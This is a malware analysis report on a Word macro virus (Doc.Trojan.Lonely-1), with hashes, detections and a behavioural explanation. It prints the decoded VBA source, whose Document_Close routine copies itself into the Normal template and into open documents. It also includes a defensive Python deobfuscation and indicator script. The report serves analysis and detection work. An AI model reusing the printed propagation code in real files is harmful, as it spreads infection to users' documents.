Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1f1f416e62e54907…

MALICIOUS

Office (OLE)

Size: 46.5 KB | Created: 2003-08-15 18:28:00 | Authoring application: Microsoft Word 10.0 | First seen: 2012-06-14
MD5: 28227cd66ad3a67a965e7ca39e3cf86e
SHA-1: 97763dcad3cb0877ead6d2f2102d9f9c77669003
SHA-256: 1f1f416e62e549075632bad56dcfcc2f30b1bfdaf32295edb9c7d8c9d301aeb8
Risk score: 148

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic

ClamAV identifies the sample as Doc.Trojan.Lonely-1. The VBA project is a self-replicating Word macro virus, not a downloader: its Document_Close handler reads the complete source of the first VBComponent of the current document's VBProject, passes it to VBSBackup, then copies it into the ThisDocument module of the Normal template and into every open document whose Saved property is False, replacing the existing code unless the module's first line is already the 'LoneLy infection marker (the marker is compared as a VBA.Chr() chain). It also clears ReadOnlyRecommended on each open document. The obfuscation is light: VBA.Int((VBA.Rnd * 0) + 1) always evaluates to 1 and VBA.Int(VBA.Rnd * 0) to 0, strings are assembled from VBA.Chr() calls, and the Decomp function expands single characters into longer strings (HKEY_CURRENT_USER, Software, Microsoft, Office, 9.0, 10.0, Word, Security, Level, AccessVBOM, Tools, Macro, Windir, \lonely.), which are the components of the registry values Word 2000 (9.0) and Word 2002 (10.0) use for the macro security level and for VBA project object model access. VBSBackup writes through System.PrivateProfileString with an empty file name, which in Word VBA targets the registry; its argument is truncated in the preview. The Retro and Stealth routines called at the top of Document_Close are outside the preview, so the exact payload is not visible here.

Heuristics (3)

  • ClamAV: Doc.Trojan.Lonely-1 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Lonely-1
  • VBA macros detected [medium, OLE_VBA_MACROS; 1 related finding]
    Document contains VBA macro code
  • Environ() call (env variable access) [low, OLE_VBA_ENVIRON]
    The macro code calls Environ() to read an environment variable

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  15724 bytes
SHA-256: 5861a57fca2f92fd51c42d7500904bd547c0003db0476eddcb2942a681747e98
Detection: ClamAV: Doc.Trojan.Lonely-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
'LoneLy
Private Sub Document_Close()
On Error Resume Next
Retro
Stealth
With ThisDocument _
.VBProject _
.VBComponents(VBA.Int((VBA.Rnd * 0) + 1)) _
.CodeModule
Ourcode = .lines(VBA.Int((VBA.Rnd * 0) + 1), _
 .CountOfLines)
End With
VBSBackup Ourcode
With Normal _
.ThisDocument _
.VBProject _
.VBComponents(VBA.Int((VBA.Rnd * 0) + 1)) _
.CodeModule
    If .lines(VBA.Int((VBA.Rnd * 0) + 1), VBA.Int((VBA.Rnd * 0) + 1)) <> VBA.Chr(39) & VBA.Chr(76) & VBA.Chr(111) & VBA.Chr(110) & VBA.Chr(101) & VBA.Chr(76) & VBA.Chr(121) Then
        .DeleteLines _
        VBA.Int((VBA.Rnd * 0) + 1), _
        .CountOfLines
        .AddFromstring _
        Ourcode
    End If
End With
For i = 1 To Documents _
.Count
With Documents(i) _
.VBProject _
.VBComponents(VBA.Int((VBA.Rnd * 0) + 1)) _
.CodeModule
    Documents(i).ReadOnlyRecommended = VBA.Int(VBA.Rnd * 0)
    If Documents(i).Saved = VBA.Int(VBA.Rnd * 0) Then
    If .lines(VBA.Int((VBA.Rnd * 0) + 1), VBA.Int((VBA.Rnd * 0) + 1)) <> VBA.Chr(39) & VBA.Chr(76) & VBA.Chr(111) & VBA.Chr(110) & VBA.Chr(101) & VBA.Chr(76) & VBA.Chr(121) Then
        .DeleteLines _
        VBA.Int((VBA.Rnd * 0) + 1), _
        .CountOfLines
        .AddFromstring _
        Ourcode
    End If
    End If
End With
Next
End Sub

Private Function Decomp(a)
On Error Resume Next
For i = 1 To Len(a)
P = Mid(a, i, VBA.Int((VBA.Rnd * 0) + 1))
If P = VBA.Chr(72) Then P = VBA.Chr(72) & VBA.Chr(75) & VBA.Chr(69) & VBA.Chr(89) & VBA.Chr(95) & VBA.Chr(67) & VBA.Chr(85) & VBA.Chr(82) & VBA.Chr(82) & VBA.Chr(69) & VBA.Chr(78) & VBA.Chr(84) & VBA.Chr(95) & VBA.Chr(85) & VBA.Chr(83) & VBA.Chr(69) & VBA.Chr(82)
If P = VBA.Chr(83) Then P = VBA.Chr(83) & VBA.Chr(111) & VBA.Chr(102) & VBA.Chr(116) & VBA.Chr(119) & VBA.Chr(97) & VBA.Chr(114) & VBA.Chr(101)
If P = VBA.Chr(77) Then P = VBA.Chr(77) & VBA.Chr(105) & VBA.Chr(99) & VBA.Chr(114) & VBA.Chr(111) & VBA.Chr(115) & VBA.Chr(111) & VBA.Chr(102) & VBA.Chr(116)
If P = VBA.Chr(79) Then P = VBA.Chr(79) & VBA.Chr(102) & VBA.Chr(102) & VBA.Chr(105) & VBA.Chr(99) & VBA.Chr(101)
If P = VBA.Chr(50) Then P = VBA.Chr(57) & VBA.Chr(46) & VBA.Chr(48)
If P = VBA.Chr(88) Then P = VBA.Chr(49) & VBA.Chr(48) & VBA.Chr(46) & VBA.Chr(48)
If P = VBA.Chr(87) Then P = VBA.Chr(87) & VBA.Chr(111) & VBA.Chr(114) & VBA.Chr(100)
If P = VBA.Chr(81) Then P = VBA.Chr(83) & VBA.Chr(101) & VBA.Chr(99) & VBA.Chr(117) & VBA.Chr(114) & VBA.Chr(105) & VBA.Chr(116) & VBA.Chr(121)
If P = VBA.Chr(76) Then P = VBA.Chr(76) & VBA.Chr(101) & VBA.Chr(118) & VBA.Chr(101) & VBA.Chr(108)
If P = VBA.Chr(65) Then P = VBA.Chr(65) & VBA.Chr(99) & VBA.Chr(99) & VBA.Chr(101) & VBA.Chr(115) & VBA.Chr(115) & VBA.Chr(86) & VBA.Chr(66) & VBA.Chr(79) & VBA.Chr(77)
If P = VBA.Chr(84) Then P = VBA.Chr(84) & VBA.Chr(111) & VBA.Chr(111) & VBA.Chr(108) & VBA.Chr(115)
If P = VBA.Chr(49) Then P = VBA.Chr(77) & VBA.Chr(97) & VBA.Chr(99) & VBA.Chr(114) & VBA.Chr(111)
If P = VBA.Chr(51) Then P = VBA.Chr(87) & VBA.Chr(105) & VBA.Chr(110) & VBA.Chr(100) & VBA.Chr(105) & VBA.Chr(114)
If P = VBA.Chr(52) Then P = VBA.Chr(92) & VBA.Chr(108) & VBA.Chr(111) & VBA.Chr(110) & VBA.Chr(101) & VBA.Chr(108) & VBA.Chr(121) & VBA.Chr(46)
Decomp = Decomp & P
Next
End Function

Private Sub VBSBackup(Ourcode)
On Error Resume Next
System.PrivateProfileString("", Decomp(VBA.Chr(72) & VBA.Chr(92) & VBA.Chr(83) & VBA.Chr(92) & VBA.Chr(77) & VBA.Chr(92) & VBA.Chr(87) & VBA.Chr(105) & VBA.Chr(110) & VBA.Chr(100) & VBA.Chr(111) & VBA.Chr(119) & VBA.Chr(115) & VBA.Chr(92) & VBA.Chr(67) & VBA.Chr(117) & VBA.Chr(114) & VBA.Chr(114) & VBA.Chr(101) & VBA.Chr(110) & VBA.Chr(116) & VBA.Chr(118) & VBA.Chr(101) & VBA.Chr(114) & VBA.Chr(115) & VBA.Chr(105) & VBA.Chr(111) & VBA.Chr(110) & VBA.Chr(92) & VBA.
... (truncated)
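An added example, not part of the report or its tooling, of how a practitioner would normalise this macro before reading it: fold the VBA.Int((VBA.Rnd * 0) + 1) and VBA.Chr() constructions into literals, pull Decomp's substitution table out of the folded text, and flag the Normal-template infection pattern. It runs on a constructed excerpt of the preview above (line continuations joined, Decomp reduced to the rules used below). The regexes are tied to this sample's exact spelling of those expressions, and the key decoded at the end is a constructed input showing what the table can produce, not the sample's truncated VBSBackup argument.

```python
import re

# Constructed excerpt of the olevba-decoded macro shown in the report: the
# preview's line continuations ("_") are joined and the Decomp loop is kept
# to the rules needed below.  VBSBackup is omitted because its argument is
# truncated on the page.
SAMPLE_VBA = r"""'LoneLy
Private Sub Document_Close()
On Error Resume Next
With ThisDocument.VBProject.VBComponents(VBA.Int((VBA.Rnd * 0) + 1)).CodeModule
Ourcode = .lines(VBA.Int((VBA.Rnd * 0) + 1), .CountOfLines)
End With
VBSBackup Ourcode
With Normal.ThisDocument.VBProject.VBComponents(VBA.Int((VBA.Rnd * 0) + 1)).CodeModule
    If .lines(VBA.Int((VBA.Rnd * 0) + 1), VBA.Int((VBA.Rnd * 0) + 1)) <> VBA.Chr(39) & VBA.Chr(76) & VBA.Chr(111) & VBA.Chr(110) & VBA.Chr(101) & VBA.Chr(76) & VBA.Chr(121) Then
        .DeleteLines VBA.Int((VBA.Rnd * 0) + 1), .CountOfLines
        .AddFromstring Ourcode
    End If
End With
End Sub
Private Function Decomp(a)
For i = 1 To Len(a)
P = Mid(a, i, VBA.Int((VBA.Rnd * 0) + 1))
If P = VBA.Chr(72) Then P = VBA.Chr(72) & VBA.Chr(75) & VBA.Chr(69) & VBA.Chr(89) & VBA.Chr(95) & VBA.Chr(67) & VBA.Chr(85) & VBA.Chr(82) & VBA.Chr(82) & VBA.Chr(69) & VBA.Chr(78) & VBA.Chr(84) & VBA.Chr(95) & VBA.Chr(85) & VBA.Chr(83) & VBA.Chr(69) & VBA.Chr(82)
If P = VBA.Chr(83) Then P = VBA.Chr(83) & VBA.Chr(111) & VBA.Chr(102) & VBA.Chr(116) & VBA.Chr(119) & VBA.Chr(97) & VBA.Chr(114) & VBA.Chr(101)
If P = VBA.Chr(77) Then P = VBA.Chr(77) & VBA.Chr(105) & VBA.Chr(99) & VBA.Chr(114) & VBA.Chr(111) & VBA.Chr(115) & VBA.Chr(111) & VBA.Chr(102) & VBA.Chr(116)
If P = VBA.Chr(79) Then P = VBA.Chr(79) & VBA.Chr(102) & VBA.Chr(102) & VBA.Chr(105) & VBA.Chr(99) & VBA.Chr(101)
If P = VBA.Chr(50) Then P = VBA.Chr(57) & VBA.Chr(46) & VBA.Chr(48)
If P = VBA.Chr(87) Then P = VBA.Chr(87) & VBA.Chr(111) & VBA.Chr(114) & VBA.Chr(100)
If P = VBA.Chr(81) Then P = VBA.Chr(83) & VBA.Chr(101) & VBA.Chr(99) & VBA.Chr(117) & VBA.Chr(114) & VBA.Chr(105) & VBA.Chr(116) & VBA.Chr(121)
If P = VBA.Chr(76) Then P = VBA.Chr(76) & VBA.Chr(101) & VBA.Chr(118) & VBA.Chr(101) & VBA.Chr(108)
If P = VBA.Chr(65) Then P = VBA.Chr(65) & VBA.Chr(99) & VBA.Chr(99) & VBA.Chr(101) & VBA.Chr(115) & VBA.Chr(115) & VBA.Chr(86) & VBA.Chr(66) & VBA.Chr(79) & VBA.Chr(77)
Decomp = Decomp & P
Next
End Function
"""

# Constant-valued expressions the sample uses in place of literals.
RND_ONE = re.compile(r"VBA\.Int\(\(VBA\.Rnd \* 0\) \+ 1\)")  # Rnd*0 is 0, so always 1
RND_ZERO = re.compile(r"VBA\.Int\(VBA\.Rnd \* 0\)")            # always 0
CHR_CALL = re.compile(r"VBA\.Chr\((\d+)\)")
CHR_CHAIN = re.compile(r"VBA\.Chr\(\d+\)(?:\s*&\s*VBA\.Chr\(\d+\))*")
SUBST_RULE = re.compile(r'If P = "(.)" Then P = "([^"]*)"')
DECOMP_CALL = re.compile(r'Decomp\("([^"]*)"\)')


def fold_constants(src: str) -> str:
    """Rewrite the Rnd tricks to 1/0 and Chr() chains to VBA string literals."""
    src = RND_ONE.sub("1", src)
    src = RND_ZERO.sub("0", src)

    def chain_to_literal(m: re.Match) -> str:
        text = "".join(chr(int(n)) for n in CHR_CALL.findall(m.group(0)))
        return '"' + text.replace('"', '""') + '"'  # VBA doubles quotes in literals

    return CHR_CHAIN.sub(chain_to_literal, src)


def extract_decomp_table(folded: str) -> dict:
    """Recover Decomp's one-character-to-string rules from the folded source.

    The original is a sequential If chain, but every replacement is longer
    than one character, so no later rule can re-match; one lookup per input
    character is equivalent."""
    return dict(SUBST_RULE.findall(folded))


def decomp(table: dict, encoded: str) -> str:
    return "".join(table.get(ch, ch) for ch in encoded)


# Behaviours of a Normal-template-infecting macro virus, checked on folded source.
INDICATORS = {
    "close_event_trigger": r"\bSub\s+(Document_Close|AutoClose)\b",
    "vbproject_access": r"\.VBProject\b",
    "codemodule_rewrite": r"\.(AddFromString|DeleteLines|InsertLines)\b",
    "normal_template_target": r"\bNormal\.ThisDocument\b",
    "lonely_marker_line": r"^'LoneLy\s*$",
    "lonely_marker_check": r'''<>\s*"'LoneLy"''',
}


def scan_indicators(folded: str) -> dict:
    return {name: bool(re.search(pat, folded, re.I | re.M))
            for name, pat in INDICATORS.items()}


def analyze(src: str) -> dict:
    folded = fold_constants(src)
    table = extract_decomp_table(folded)
    hits = scan_indicators(folded)
    # Reads its own module on an event and writes it into other projects: self-replication.
    replicates = (hits["close_event_trigger"] and hits["vbproject_access"]
                  and hits["codemodule_rewrite"])
    decoded_args = [decomp(table, a) for a in DECOMP_CALL.findall(folded)]
    return {"folded": folded, "table": table, "indicators": hits,
            "self_replicating": replicates, "decoded_decomp_args": decoded_args}


if __name__ == "__main__":
    result = analyze(SAMPLE_VBA)
    print("self-replicating:", result["self_replicating"])
    for k, v in result["table"].items():
        print(f"  Decomp rule {k!r} -> {v!r}")
    # Constructed input: what the table can produce, not the sample's own
    # (truncated) VBSBackup argument.
    print(decomp(result["table"], "H\\S\\M\\O\\2\\W\\Q\\L"))
```

Run against the prefix that is visible in the truncated VBSBackup call (H\S\M\Windows\Currentversion\), the recovered table yields HKEY_CURRENT_USER\Software\Microsoft\Wordindows\Currentversion\, because the W rule expands to Word and lowercase characters have no rule; whatever follows in that argument is cut off in the preview.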